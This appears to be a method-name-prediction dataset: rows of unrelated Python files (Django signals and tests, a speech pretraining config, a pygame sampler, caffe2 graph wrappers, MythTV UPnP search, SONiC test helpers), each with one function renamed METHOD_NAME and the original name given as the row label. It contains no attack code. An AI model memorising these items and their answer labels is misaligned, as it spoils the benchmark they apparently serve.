Logs.debug('deps: gccdeps for %s returned %s', self, nodes)
bld.node_deps[self.uid()] = nodes
bld.raw_deps[self.uid()] = []
try:
del self.cache_sig
except AttributeError:
pass
Task.Task.post_run(self)
def sig_implicit_deps(self):
if not self.__class__.__name__ in self.env.ENABLE_GCCDEPS:
return super(self.derived_gccdeps, self).sig_implicit_deps()
try:
return Task.Task.sig_implicit_deps(self)
except Errors.WafError:
return Utils.SIG_NIL
def wrap_compiled_task(classname):
derived_class = type(classname, (Task.classes[classname],), {})
derived_class.derived_gccdeps = derived_class
derived_class.post_run = post_run
derived_class.scan = scan
derived_class.sig_implicit_deps = sig_implicit_deps
for k in ('c', 'cxx'):
if k in Task.classes:
wrap_compiled_task(k)
@before_method('process_source')
@feature('force_gccdeps')
def force_gccdeps(self):
self.env.ENABLE_GCCDEPS = ['c', 'cxx']
def configure(conf):
# in case someone provides a --enable-gccdeps command-line option
if not getattr(conf.options, 'enable_gccdeps', True):
return
global gccdeps_flags
flags = conf.env.GCCDEPS_FLAGS or gccdeps_flags
if conf.env.CC_NAME in supported_compilers:
try:
conf.check(fragment='int main() { return 0; }', features='c force_gccdeps', cflags=flags, msg='Checking for c flags %r' % ''.join(flags))
except Errors.ConfigurationError:
pass
else:
conf.env.append_value('CFLAGS', flags)
conf.env.append_unique('ENABLE_GCCDEPS', 'c')
if conf.env.CXX_NAME in supported_compilers:
try:
conf.check(fragment='int main() { return 0; }', features='cxx force_gccdeps', cxxflags=flags, msg='Checking for cxx flags %r' % ''.join(flags))
except Errors.ConfigurationError:
pass
else:
conf.env.append_value('CXXFLAGS', flags)
conf.env.append_unique('ENABLE_GCCDEPS', 'cxx')
def options(opt):
raise ValueError('Do not load gccdeps options')
|
298,462 | finalize job | import os
import logging
import mistune
import toml
from django.conf import settings
from django.db.models.signals import post_save
from django.dispatch import receiver
from biostar.recipes.models import Project, Access, Analysis, Job, Data
from biostar.recipes import util, auth
logger = logging.getLogger("engine")
__CURRENT_DIR = os.path.abspath(os.path.dirname(__file__))
DATA_DIR = os.path.join(__CURRENT_DIR, 'recipes')
def join(*args):
return os.path.join(*args)
@receiver(post_save, sender=Project)
def update_access(sender, instance, created, raw, update_fields, **kwargs):
# Give the owner WRITE ACCESS if they do not have it.
entry = Access.objects.filter(user=instance.owner, project=instance, access=Access.WRITE_ACCESS)
if entry.first() is None:
entry = Access.objects.create(user=instance.owner, project=instance, access=Access.WRITE_ACCESS)
def strip_json(json_text):
"""
Strip settings parameter in json_text to only contain execute options
Deletes the 'settings' parameter if there are no execute options.
"""
try:
local_dict = toml.loads(json_text)
except Exception as exep:
logger.error(f'Error loading json text: {exep}, {json_text}')
return json_text
# Fetch the execute options
execute_options = local_dict.get('settings', {}).get('execute', {})
data_options = local_dict.get('settings', {}).get('create', {})
# Check to see if it is present
if execute_options or data_options:
# Strip run settings of every thing but execute options
local_dict['settings'] = dict(execute=execute_options, create=data_options)
else:
# NOTE: Delete 'settings' from json text
local_dict['settings'] = ''
del local_dict['settings']
new_json = toml.dumps(local_dict)
return new_json
def initial_recipe(project):
# Add starter hello world recipe to project.
try:
json_text = open(join(DATA_DIR, 'starter.hjson'), 'r').read()
template = open(join(DATA_DIR, 'starter.sh'), 'r').read()
image = os.path.join(DATA_DIR, 'starter.png')
image_stream = open(image, 'rb')
except Exception as exc:
logger.error(f'{exc}')
json_text = ''
template = "echo 'Hello World'"
image_stream = None
name = 'First recipe'
text = "This recipe was created automatically."
# Create starter recipe.
recipe = auth.create_analysis(project=project, json_text=json_text, template=template,
name=name, text=text, stream=image_stream, security=Analysis.AUTHORIZED)
return recipe
@receiver(post_save, sender=Project)
def finalize_project(sender, instance, created, raw, update_fields, **kwargs):
if created:
# Generate friendly uid
uid = auth.new_uid(obj=instance, objtype=Project, prefix="project")
instance.uid = uid
# Set the project directory
instance.dir = instance.dir or join(settings.MEDIA_ROOT, "projects", f"{instance.uid}")
# Get project with highest rank and add to it,
# ensuring this new project is at the top of lists
first = Project.objects.order_by('-rank').first()
instance.rank = first.rank + instance.pk if first else instance.pk
# Create the job directory if it does not exist.
os.makedirs(instance.dir, exist_ok=True)
# Update project fields.
Project.objects.filter(id=instance.id).update(uid=instance.uid, dir=instance.dir, rank=instance.rank)
# Create a starter recipe if none exist.
if not instance.analysis_set.exists():
initial_recipe(project=instance)
# Cascade deleted states to recipe, data, and results.
if instance.deleted:
Analysis.objects.filter(project__id=instance.pk).update(deleted=True)
Data.objects.filter(project__id=instance.pk).update(deleted=True)
Job.objects.filter(project__id=instance.pk).update(deleted=True)
@receiver(post_save, sender=Analysis)
def finalize_recipe(sender, instance, created, raw, update_fields, **kwargs):
if created:
# Generate friendly uid
uid = auth.new_uid(obj=instance, objtype=Analysis, prefix="recipe")
instance.uid = uid
Analysis.objects.filter(id=instance.id).update(uid=instance.uid)
# Get recipe with highest rank and add to it,
# ensuring this new recipe is at the top of lists
first = Analysis.objects.order_by('-rank').first()
instance.rank = first.rank + instance.pk if first else instance.pk
# Update the last edit date and user of project
user = instance.lastedit_user
# Strip json text of 'settings' parameter
instance.json_text = strip_json(instance.json_text)
Project.objects.filter(id=instance.project.id).update(lastedit_date=instance.lastedit_date,
lastedit_user=user)
# Update information of all children belonging to this root.
if instance.is_root:
instance.update_children()
# Update the project count and last edit date when job is created
instance.project.set_counts()
@receiver(post_save, sender=Job)
def METHOD_NAME(sender, instance, created, raw, update_fields, **kwargs):
# Update the project count.
instance.project.set_counts()
if created:
# Generate friendly uid
uid = auth.new_uid(obj=instance, objtype=Job, prefix="job")
instance.uid = uid
# Generate the path based on the uid.
instance.path = join(settings.MEDIA_ROOT, "jobs", f"{instance.uid}")
# Create the job directory if it does not exist.
os.makedirs(instance.path, exist_ok=True)
# Update the information in db.
Job.objects.filter(id=instance.id).update(uid=instance.uid, path=instance.path,
text=instance.text, html=instance.html)
@receiver(post_save, sender=Data)
def finalize_data(sender, instance, created, raw, update_fields, **kwargs):
# Update the projects last edit user when a data is uploaded
Project.objects.filter(id=instance.project.id).update(lastedit_user=instance.lastedit_user,
lastedit_date=instance.lastedit_date)
# Update the project count.
instance.project.set_counts()
if created:
# Generate friendly uid
uid = auth.new_uid(obj=instance, objtype=Data, prefix="data")
instance.uid = uid
# Set the data directory with the recently created uid
instance.dir = join(instance.get_project_dir(), f"{instance.uid}")
# Set the toc file with the recently created uid
instance.toc = join(settings.TOC_ROOT, f"toc-{instance.uid}.txt")
# Build the data directory.
os.makedirs(instance.dir, exist_ok=True)
# Set the table of contents for the data
if not os.path.isfile(instance.toc):
with open(instance.toc, 'wt') as fp:
pass
# Update the dir, toc, and uid.
Data.objects.filter(id=instance.id).update(uid=instance.uid, dir=instance.dir, toc=instance.toc)
instance.make_toc() |
298,463 | set up test data | import doctest
from datetime import datetime
from django.test import TestCase, override_settings
from django.utils import timezone
from members import models
from members.models import Member, Profile
def load_tests(loader, tests, ignore):
"""Load doctests."""
tests.addTests(doctest.DocTestSuite(models))
@override_settings(SUSPEND_SIGNALS=True)
class MemberBirthdayTest(TestCase):
fixtures = ["members.json"]
def _make_date(self, date):
return timezone.make_aware(datetime.strptime(date, "%Y-%m-%d"))
def _get_members(self, start, end):
start_date = self._make_date(start)
end_date = self._make_date(end)
return Member.current_members.with_birthdays_in_range(start_date, end_date)
def _assert_none(self, start, end):
members = self._get_members(start, end)
self.assertEqual(len(members), 0)
def _assert_thom(self, start, end):
members = self._get_members(start, end)
self.assertEqual(len(members), 1)
self.assertEqual(members[0].get_full_name(), "Thom Wiggers")
def test_one_year_contains_birthday(self):
self._assert_thom("2016-03-02", "2016-08-08")
def test_one_year_not_contains_birthday(self):
self._assert_none("2016-01-01", "2016-02-01")
def test_span_year_contains_birthday(self):
self._assert_thom("2015-08-09", "2016-08-08")
def test_span_year_not_contains_birthday(self):
self._assert_none("2015-12-25", "2016-03-01")
def test_span_multiple_years_contains_birthday(self):
self._assert_thom("2012-12-31", "2016-01-01")
def test_range_before_person_born(self):
self._assert_none("1985-12-12", "1985-12-13")
def test_person_born_in_range_in_one_year(self):
self._assert_thom("1993-01-01", "1993-04-01")
def test_person_born_in_range_spanning_one_year(self):
self._assert_thom("1992-12-31", "1993-04-01")
def test_person_born_in_range_spanning_multiple_years(self):
self._assert_thom("1992-12-31", "1995-01-01")
@override_settings(SUSPEND_SIGNALS=True)
class MemberTest(TestCase):
fixtures = ["members.json"]
def test_has_been_member(self):
member = Member.objects.get(pk=1)
self.assertTrue(member.has_been_member())
m1 = member.membership_set.all()[0]
m1.type = "honorary"
m1.save()
self.assertFalse(member.has_been_member())
def test_has_been_honorary_member(self):
member = Member.objects.get(pk=1)
self.assertFalse(member.has_been_honorary_member())
m1 = member.membership_set.all()[0]
m1.type = "honorary"
m1.save()
self.assertTrue(member.has_been_honorary_member())
class MemberDisplayNameTest(TestCase):
@classmethod
def METHOD_NAME(cls):
cls.member = Member.objects.create(
username="johnnytest", first_name="", last_name=""
)
cls.profile = Profile.objects.create(
user_id=cls.member.pk,
initials=None,
nickname=None,
display_name_preference="full",
)
def setUp(self):
self.profile.display_name_preference = "full"
# Assuming we always have a first and last name
self.profile.user.first_name = "Johnny"
self.profile.user.last_name = "Test"
self.profile.nickname = None
self.profile.initials = None
def test_check_display_name_full(self):
self.assertEqual("Johnny Test", self.profile.display_name())
self.assertEqual("Johnny", self.profile.short_display_name())
def test_check_display_name_nickname(self):
self.profile.display_name_preference = "nickname"
self.assertEqual("Johnny Test", self.profile.display_name())
self.assertEqual("Johnny", self.profile.short_display_name())
self.profile.nickname = "John"
self.assertEqual("'John'", self.profile.display_name())
self.assertEqual("'John'", self.profile.short_display_name())
def test_check_display_name_firstname(self):
self.profile.display_name_preference = "firstname"
self.assertEqual("Johnny", self.profile.display_name())
self.assertEqual("Johnny", self.profile.short_display_name())
def test_check_display_name_initials(self):
self.profile.display_name_preference = "initials"
self.assertEqual("Test", self.profile.display_name())
self.assertEqual("Test", self.profile.short_display_name())
self.profile.initials = "J"
self.assertEqual("J Test", self.profile.display_name())
self.assertEqual("J Test", self.profile.short_display_name())
def test_check_display_name_fullnick(self):
self.profile.display_name_preference = "fullnick"
self.assertEqual("Johnny Test", self.profile.display_name())
self.assertEqual("Johnny", self.profile.short_display_name())
self.profile.nickname = "John"
self.assertEqual("Johnny 'John' Test", self.profile.display_name())
self.assertEqual("Johnny", self.profile.short_display_name())
def test_check_display_name_nicklast(self):
self.profile.display_name_preference = "nicklast"
self.assertEqual("Johnny Test", self.profile.display_name())
self.assertEqual("Johnny", self.profile.short_display_name())
self.profile.nickname = "John"
self.assertEqual("'John' Test", self.profile.display_name())
self.assertEqual("'John'", self.profile.short_display_name()) |
298,464 | inference | import torch
from torch.nn import L1Loss
from s3prl.corpus.librispeech import librispeech_for_pretrain
from s3prl.dataset.pretrain_tera_pipe import PretrainTeraPipe
from s3prl.nn.predictor_mockingjay import PredictorMockingjay
from s3prl.nn.transformer_mockingjay import TransformerMockingjay
from s3prl.sampler import FixedBatchSizeBatchSampler, MaxTimestampBatchSampler
from s3prl.task import Task
from s3prl.task.feat_reconstruction_task import FeatReconstructionTask
from s3prl.util.configuration import override_parent_cfg
from s3prl.util.workspace import Workspace
from .base import SslProblem
_input_size = 80
_mask_args = dict(
position_encoding_size=768, # int, this should be identical to `hidden_size`
mask_proportion=0.15, # float, mask this percentage of all spectrogram frames in each sequence at random during MAM training
mask_consecutive_min=7, # int, mask this amount of consecutive frames
mask_consecutive_max=7, # int, mask this amount of consecutive frames
mask_allow_overlap=True, # bool, allow overlap masking
mask_bucket_ratio=1.5, # float, only used when overlap is not allowed. sample a mask from each bucket in size of [sampled mask_consecutive * mask_bucket_ratio]
mask_frequency=0.2, # float, mask maximum this percentage of frequency bands, set to 0 for no frequency mask
)
_noise_args = dict(
noise_proportion=0.0, # float, for this percentage of the time, Gaussian noise will be applied on all frames during MAM training, set to 0 for no noise
)
_audio_config = dict(
win_ms=25,
hop_ms=10,
n_freq=201,
n_mels=_input_size,
n_mfcc=13,
input={
"channel": 0,
"cmvn": True,
"delta": 0,
"feat_type": "mel",
"log": True,
},
target={
"channel": 1,
"cmvn": True,
"delta": 0,
"feat_type": "mel",
"log": True,
},
)
_pretrain_task_pipe_config = dict(
_cls=PretrainTeraPipe,
target_level=-25,
**_mask_args,
**_noise_args,
**_audio_config,
)
_transformer_config = dict(
hidden_size=768, # Size of the encoder layers and the pooler layer.
num_hidden_layers=3, # Number of hidden layers in the Transformer encoder.
num_attention_heads=12, # Number of attention heads for each attention layer in the Transformer encoder.
intermediate_size=3072, # The size of the "intermediate" (i.e., feed-forward) layer in the Transformer encoder.
hidden_act="gelu", # The non-linear activation function (function or string) in the encoder and pooler. If string, "gelu", "relu" and "swish" are supported.
hidden_dropout_prob=0.1, # The dropout probabilitiy for all fully connected layers in the embeddings, encoder, and pooler.
attention_probs_dropout_prob=0.1, # The dropout ratio for the attention probabilities.
initializer_range=0.02, # The sttdev of the truncated_normal_initializer for initializing all weight matrices.
layer_norm_eps=1.0e-12, # The epsilon used by LayerNorm.
share_layer=False, # Share layer weights
pre_layer_norm=False, # To apply the pre layer normalization technique introduced in: https://arxiv.org/abs/2002.04745
)
class Tera(SslProblem):
"""
Tera pre-train problem
"""
@override_parent_cfg(
corpus=dict(
_cls=librispeech_for_pretrain,
dataset_root="???",
),
train_datapipe=_pretrain_task_pipe_config,
train_sampler=dict(
_cls=MaxTimestampBatchSampler,
max_timestamp=16000 * 20,
shuffle=True,
),
valid_datapipe=_pretrain_task_pipe_config,
valid_sampler=dict(
_cls=FixedBatchSizeBatchSampler,
batch_size=2,
),
test_datapipe=_pretrain_task_pipe_config,
test_sampler=dict(
_cls=FixedBatchSizeBatchSampler,
batch_size=2,
),
upstream=dict(
_cls=TransformerMockingjay,
config=_transformer_config,
input_dim=_input_size,
output_attentions=False,
keep_multihead_output=False,
with_input_module=True,
),
predictor=dict(
_cls=PredictorMockingjay,
config=_transformer_config,
output_dim=_input_size,
input_dim=None, # automatically use `hidden_size` from `_transformer_config`
),
task=dict(
_cls=FeatReconstructionTask,
loss=L1Loss,
),
)
@classmethod
def setup_problem(cls, **cfg):
"""
This setups the Tera problem, containing train/valid/test datasets & samplers and a task object
"""
super().setup_problem(**cfg)
@override_parent_cfg(
optimizer=dict(
_cls="torch.optim.AdamW",
lr=2.0e-4,
),
trainer=dict(
total_steps=1000000,
eval_step=50000,
save_step=50000,
gradient_clipping=5.0,
gradient_accumulate_steps=4,
valid_metric="loss",
valid_higher_better=False,
),
)
@classmethod
def train(cls, **cfg):
"""
Train the setup problem with the train/valid datasets & samplers and the task object
"""
super().train(**cfg)
@override_parent_cfg()
@classmethod
def METHOD_NAME(cls, **cfg):
super().METHOD_NAME(**cfg)
@classmethod
def save_additional(
cls,
additional_dir: Workspace,
workspace: Workspace,
task: Task,
):
all_states = dict(
Config={}, # placeholder
SpecHead=task.predictor.state_dict(),
Transformer=task.upstream.state_dict(),
Upstream_Config=dict(
transformer=_transformer_config,
audio=_audio_config,
task=dict(sequence_length=0),
),
)
all_states["Upstream_Config"]["audio"][
"target_level"
] = _pretrain_task_pipe_config["target_level"]
torch.save(
all_states, str(additional_dir.parent.resolve()) + "/all_states.ckpt"
)
@override_parent_cfg(
start_stage=0,
final_stage=2,
stage_0=dict(
_method="setup_problem",
),
stage_1=dict(
_method="train",
),
stage_2=dict(
_method="inference",
),
)
@classmethod
def run_stages(cls, **cfg):
super().run_stages(**cfg) |
298,465 | adjust pitch | # -*- coding:utf-8 -*-
"""
This file is part of OpenSesame.
OpenSesame is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
OpenSesame is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with OpenSesame. If not, see <http://www.gnu.org/licenses/>.
"""
from libopensesame.py3compat import *
from pygame.locals import *
import pygame
from openexp._sampler.sampler import Sampler
from libopensesame.exceptions import SoundFileDoesNotExist, \
UnsupportedSoundFileFormat, InvalidValue
from libopensesame.oslogging import oslogger
from libopensesame import misc
from openexp.keyboard import Keyboard
from openexp.backend import configurable
import os.path
try:
import numpy
except:
numpy = None
import pygame.mixer as mixer
class Legacy(Sampler):
r"""This is a sampler backend built on top of PyGame. For function
specifications and docstrings, see `openexp._sampler.sampler`.
"""
# The settings variable is used by the GUI to provide a list of back-end
# settings
settings = {
u"sound_buf_size": {
u"name": u"Sound buffer size",
u"description": u"Size of the sound buffer (increase if playback is choppy)",
u"default": 1024
},
u"sound_freq": {
u"name": u"Sampling frequency",
u"description": u"Determines the sampling rate",
u"default": 48000
},
u"sound_sample_size": {
u"name": u"Sample size",
u"description": u"Determines the bith depth (negative = signed)",
u"default": -16
},
"sound_channels": {
u"name": u"The number of sound channels",
u"description": u"1 = mono, 2 = stereo",
u"default": 2
},
}
def __init__(self, experiment, src, **playback_args):
if src is not None:
if isinstance(src, str):
if not os.path.exists(src):
raise SoundFileDoesNotExist(src)
if os.path.splitext(src)[1].lower() not in (".ogg", ".wav"):
raise UnsupportedSoundFileFormat(src)
self.sound = mixer.Sound(src)
Sampler.__init__(self, experiment, src, **playback_args)
self.keyboard = Keyboard(experiment)
def set_config(self, **cfg):
if u'duration' in cfg and cfg[u'duration'] is None:
cfg[u'duration'] = 0
if u'fade_in' in cfg and cfg[u'fade_in'] is None:
cfg[u'fade_in'] = 0
Sampler.set_config(self, **cfg)
if u'volume' in cfg:
self.sound.set_volume(cfg[u'volume'])
if u'pitch' in cfg:
self.METHOD_NAME(cfg[u'pitch'])
if u'pan' in cfg:
self.adjust_pan(cfg[u'pan'])
def METHOD_NAME(self, p):
# On Android, numpy does not exist and this is not supported
if numpy is None:
return
if type(p) not in (int, float) or p <= 0:
raise InvalidValue(f'pitch should be a positive number, not {p}')
if p == 1:
return
buf = pygame.sndarray.array(self.sound)
_buf = []
for i in range(int(float(len(buf)) / p)):
_buf.append(buf[int(float(i) * p)])
self.sound = pygame.sndarray.make_sound(
numpy.array(_buf, dtype=u"int16"))
def adjust_pan(self, p):
# On Android, numpy does not exist and this is not supported
if numpy is None:
return
if type(p) not in (int, float) and p not in (u"left", u"right"):
raise InvalidValue(
f'pan should be a number, "left" or "right", not {p}')
if p == 0:
return
buf = pygame.sndarray.array(self.sound)
for i in range(len(buf)):
l = buf[i][0]
r = buf[i][1]
if p == "left":
r = 0
elif p == "right":
l = 0
elif p < 0:
r = int(float(r) / abs(p))
else:
l = int(float(l) / p)
buf[i][0] = l
buf[i][1] = r
self.sound = pygame.sndarray.make_sound(numpy.array(buf))
@configurable
def play(self, **playback_args):
self.sound.play(maxtime=self.duration, fade_ms=self.fade_in)
if self.block:
self.wait()
def stop(self):
mixer.stop()
def pause(self):
mixer.pause()
def resume(self):
mixer.unpause()
def is_playing(self):
return bool(mixer.get_busy())
def wait(self):
while mixer.get_busy():
self.keyboard.flush()
@staticmethod
def init_sound(experiment):
oslogger.info(
u"sampling freq = %d, buffer size = %d"
% (experiment.var.sound_freq, experiment.var.sound_buf_size)
)
if hasattr(mixer, u'get_init') and mixer.get_init():
oslogger.warning(u'mixer already initialized, closing')
pygame.mixer.quit()
mixer.pre_init(
experiment.var.sound_freq,
experiment.var.sound_sample_size,
experiment.var.sound_channels,
experiment.var.sound_buf_size
)
try:
mixer.init()
except pygame.error:
oslogger.error(u'failed to initialize mixer')
@staticmethod
def close_sound(experiment):
mixer.quit()
# Non PEP-8 alias for backwards compatibility
legacy = Legacy |
298,466 | control flow |
import errno
import os
from subprocess import PIPE, Popen
import caffe2.python._import_c_extension as C
from caffe2.proto import caffe2_pb2
from caffe2.python import core
class NNModule:
def __init__(self, net=None, device_map=None):
if net is not None:
serialized_proto = None
if isinstance(net, core.Net):
serialized_proto = net.Proto().SerializeToString()
elif isinstance(net, caffe2_pb2.NetDef):
serialized_proto = net.SerializeToString()
# Distributed
if device_map is not None:
serialized_device_map = {}
for k in device_map:
serialized_device_map[k] = device_map[k].SerializeToString()
self._NNModule = C.NNModuleFromProtobufDistributed(
serialized_proto, serialized_device_map
)
# Default
elif serialized_proto:
self._NNModule, self._OpList = C.NNModuleFromProtobuf(serialized_proto)
else:
raise Exception(
"NNModule can be constructed with core.Net or caffe2_pb2.NetDef types"
)
else:
self._NNModule = C.NNModule()
@property
def dataFlow(self):
return self._NNModule.dataFlow()
@property
def METHOD_NAME(self):
return self._NNModule.getExecutionOrder()
@property
def nodes(self):
return self._NNModule.dataFlow().nodes
@property
def operators(self):
return self._NNModule.dataFlow().operators
@property
def tensors(self):
return self._NNModule.dataFlow().tensors
def createNode(self, val):
return self._NNModule.dataFlow().createNode(val)
def deleteNode(self, node):
return self._NNModule.dataFlow().deleteNode(node)
def createEdge(self, a, b):
return self._NNModule.dataFlow().createEdge(a, b)
def deleteEdge(self, a, b=None):
if b:
self._NNModule.dataFlow().deleteEdge(a, b)
else:
self._NNModule.dataFlow().deleteEdge(a)
def replaceNode(self, old_node, new_node):
return self._NNModule.dataFlow().replaceNode(old_node, new_node)
def replaceProducer(self, tensor, new_producer):
C.replaceProducer(tensor, new_producer)
def replaceAllUsesWith(self, old_tensor, new_tensor):
C.replaceAllUsesWith(old_tensor, new_tensor)
def replaceAsConsumer(self, old_consumer, new_consumer):
C.replaceAsConsumer(old_consumer, new_consumer)
def replaceSubgraph(self, subgraph, new_node, inputs, outputs):
self._NNModule.replaceSubgraph(subgraph, new_node, inputs, outputs)
def deleteSubgraph(self, subgraph):
self._NNModule.deleteSubgraph(subgraph)
def createUniqueDataNode(self, prefix="_unique"):
return self._NNModule.createUniqueDataNode(prefix)
def convertToCaffe2Proto(self, old_proto=None):
if not old_proto:
old_proto = caffe2_pb2.NetDef()
output = self._NNModule.convertToCaffe2Proto(old_proto)
new_proto = caffe2_pb2.NetDef()
new_proto.ParseFromString(output)
return new_proto
def match(self, pattern):
for n in self.dataFlow.getMutableNodes():
m = C.matchSubgraph(n, pattern)
if m:
yield m
def render(s):
s = str(s)
cmd_exists = lambda x: any(
os.access(os.path.join(path, x), os.X_OK)
for path in os.getenv("PATH", "").split(os.pathsep)
)
if cmd_exists("graph-easy"):
p = Popen("graph-easy", stdin=PIPE)
try:
p.stdin.write(s.encode("utf-8"))
except IOError as e:
if e.errno == errno.EPIPE or e.errno == errno.EINVAL:
pass
else:
# Raise any other error.
raise
p.stdin.close()
p.wait()
else:
print(s)
NeuralNetOperator = C.NeuralNetOperator
Operator = C.NeuralNetOperator
NeuralNetData = C.NeuralNetData
Data = C.NeuralNetData
NNSubgraph = C.NNSubgraph
NNMatchGraph = C.NNMatchGraph
Graph = C.Graph
Annotation = C.Annotation |
298,467 | use dedicated calendar | import datetime
import importlib
import logging
import traceback
from typing import Dict, List, Optional
from .collection import Collection
_LOGGER = logging.getLogger(__name__)
class Customize:
"""Customize one waste collection type."""
def __init__(
self,
waste_type,
alias=None,
show=True,
icon=None,
picture=None,
METHOD_NAME=False,
dedicated_calendar_title=None,
):
self._waste_type = waste_type
self._alias = alias
self._show = show
self._icon = icon
self._picture = picture
self._use_dedicated_calendar = METHOD_NAME
self._dedicated_calendar_title = dedicated_calendar_title
@property
def waste_type(self):
return self._waste_type
@property
def alias(self):
return self._alias
@property
def show(self):
return self._show
@property
def icon(self):
return self._icon
@property
def picture(self):
return self._picture
@property
def METHOD_NAME(self):
return self._use_dedicated_calendar
@property
def dedicated_calendar_title(self):
return self._dedicated_calendar_title
def __repr__(self):
return f"Customize{{waste_type={self._waste_type}, alias={self._alias}, show={self._show}, icon={self._icon}, picture={self._picture}}}"
def filter_function(entry: Collection, customize: Dict[str, Customize]):
c = customize.get(entry.type)
if c is None:
return True
else:
return c.show
def customize_function(entry: Collection, customize: Dict[str, Customize]):
c = customize.get(entry.type)
if c is not None:
if c.alias is not None:
entry.set_type(c.alias)
if c.icon is not None:
entry.set_icon(c.icon)
if c.picture is not None:
entry.set_picture(c.picture)
return entry
class SourceShell:
def __init__(
self,
source,
customize: Dict[str, Customize],
title: str,
description: str,
url: Optional[str],
calendar_title: Optional[str],
unique_id: str,
):
self._source = source
self._customize = customize
self._title = title
self._description = description
self._url = url
self._calendar_title = calendar_title
self._unique_id = unique_id
self._refreshtime = None
self._entries: List[Collection] = []
@property
def refreshtime(self):
return self._refreshtime
@property
def title(self):
return self._title
@property
def description(self):
return self._description
@property
def url(self):
return self._url
@property
def calendar_title(self):
return self._calendar_title or self._title
@property
def unique_id(self):
return self._unique_id
def fetch(self):
"""Fetch data from source."""
try:
# fetch returns a list of Collection's
entries = self._source.fetch()
except Exception:
_LOGGER.error(
f"fetch failed for source {self._title}:\n{traceback.format_exc()}"
)
return
self._refreshtime = datetime.datetime.now()
# strip whitespaces
for e in entries:
e.set_type(e.type.strip())
# filter hidden entries
entries = filter(lambda x: filter_function(x, self._customize), entries)
# customize fetched entries
entries = map(lambda x: customize_function(x, self._customize), entries)
self._entries = list(entries)
def get_dedicated_calendar_types(self):
"""Return set of waste types with a dedicated calendar."""
types = set()
for key, customize in self._customize.items():
if customize.show and customize.METHOD_NAME:
types.add(key)
return types
def get_calendar_title_for_type(self, type):
"""Return calendar title for waste type (used for dedicated calendars)."""
c = self._customize.get(type)
if c is not None and c.dedicated_calendar_title:
return c.dedicated_calendar_title
return self.get_collection_type_name(type)
def get_collection_type_name(self, type):
c = self._customize.get(type)
if c is not None and c.alias:
return c.alias
return type
@staticmethod
def create(
source_name: str,
customize: Dict[str, Customize],
source_args,
calendar_title: Optional[str] = None,
):
# load source module
try:
source_module = importlib.import_module(
f"waste_collection_schedule.source.{source_name}"
)
except ImportError:
_LOGGER.error(f"source not found: {source_name}")
return
# create source
source = source_module.Source(**source_args) # type: ignore
# create source shell
g = SourceShell(
source=source,
customize=customize,
title=source_module.TITLE, # type: ignore[attr-defined]
description=source_module.DESCRIPTION, # type: ignore[attr-defined]
url=source_module.URL, # type: ignore[attr-defined]
calendar_title=calendar_title,
unique_id=calc_unique_source_id(source_name, source_args),
)
return g
def calc_unique_source_id(source_name, source_args):
return source_name + str(sorted(source_args.items())) |
298,468 | search myth fe | # -*- coding: utf-8 -*-
"""Provides tools for UPNP searches"""
from MythTV.exceptions import MythError
from MythTV.logging import MythLog
from time import time
import socket
class MSearch( object ):
"""
Opens a socket for performing UPNP searches.
"""
def __init__(self):
self.log = MythLog('Python M-Search')
port = 1900
addr = '239.255.255.250'
self.dest = (addr, port)
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM,
socket.IPPROTO_UDP)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
listening = False
while listening == False:
try:
self.sock.bind(('', port))
self.addr = (addr, port)
listening = True
except socket.error as e:
if port < 1910:
port += 1
else:
raise MythError(MythError.SOCKET, e)
self.log(MythLog.UPNP|MythLog.SOCKET, MythLog.DEBUG,
'Port %d opened for UPnP search.' % port)
self.sock.setblocking(0)
def __del__(self):
self.sock.close()
def search(self, timeout=5.0, filter=None):
"""
obj.search(timeout=5.0, filter=None) -> response dicts
IN:
timeout -- in seconds
filter -- optional list of ST strings to search for
OUT:
response -- a generator returning dicts containing the fields
content-length, request, date, usn, location,
cache-control, server, ext, st
"""
self.log(MythLog.UPNP, MythLog.DEBUG, 'running UPnP search')
sock = self.sock
sreq = '\r\n'.join(['M-SEARCH * HTTP/1.1',
'HOST: %s:%s' % self.addr,
'MAN: "ssdp:discover"',
'MX: %d' % timeout,
'ST: ssdp:all',''])
self._runsearch = True
# spam the request a couple times
[sock.sendto(sreq.encode('utf-8'), self.dest) for i in range(3)]
atime = time()+timeout
while (time()<atime) and self._runsearch:
try:
sdata, saddr = sock.recvfrom(2048)
except socket.error:
continue #no data, continue
sdata = sdata.decode('utf-8')
lines = sdata.split('\n')
sdict = {'request':lines[0].strip()}
for line in lines[1:]:
fields = line.split(':',1)
if len(fields) == 2:
sdict[fields[0].strip().lower()] = fields[1].strip()
if ('st' not in sdict) or ('location' not in sdict):
continue
if filter:
if sdict['st'] not in filter:
continue
self.log(MythLog.UPNP, MythLog.DEBUG, sdict['st'], sdict['location'])
yield sdict
def searchMythBE(self, timeout=5.0):
"""
obj.searchMythBE(timeout=5.0) -> response dicts
Filters responses for those from `mythbackend`.
IN:
timeout -- in seconds
OUT:
response -- a generator returning dicts containing the fields
content-length, request, date, usn, location,
cache-control, server, ext, st
"""
location = []
for res in self.search(timeout, (\
'urn:schemas-mythtv-org:device:MasterMediaServer:1',
'urn:schemas-mythtv-org:device:SlaveMediaServer:1')):
if res['location'] not in location:
location.append(res['location'])
yield res
def METHOD_NAME(self, timeout=5.0):
"""
obj.searchMythFE(timeout=5.0) -> response dicts
Filters responses for those from `mythfrontend`.
IN:
timeout -- in seconds
OUT:
response -- a generator returning dicts containing the fields
content-length, request, date, usn, location,
cache-control, server, ext, st
"""
location = []
for res in self.search(timeout, \
'urn:schemas-upnp-org:device:MediaRenderer:1'):
if 'MythTV' not in res['server']:
continue
if res['location'] not in location:
location.append(res['location'])
yield res
def terminateSearch(self):
"""
Prematurely terminate an running search prior
to the specified timeout.
"""
self._runsearch = False
|
298,469 | remove mclag domain | # Common file to test all MCLAG related changes
from swsscommon import swsscommon
import time
import re
import json
import pytest
import platform
from distutils.version import StrictVersion
def delete_table_keys(db, table):
tbl = swsscommon.Table(db, table)
keys = tbl.getKeys()
for key in keys:
tbl.delete(key)
#check table entry exits with this key
def check_table_exists(db, table, key):
error_info = [ ]
tbl = swsscommon.Table(db, table)
keys = tbl.getKeys()
if key not in keys:
error_info.append("The table with desired key %s not found" % key)
return False, error_info
return True, error_info
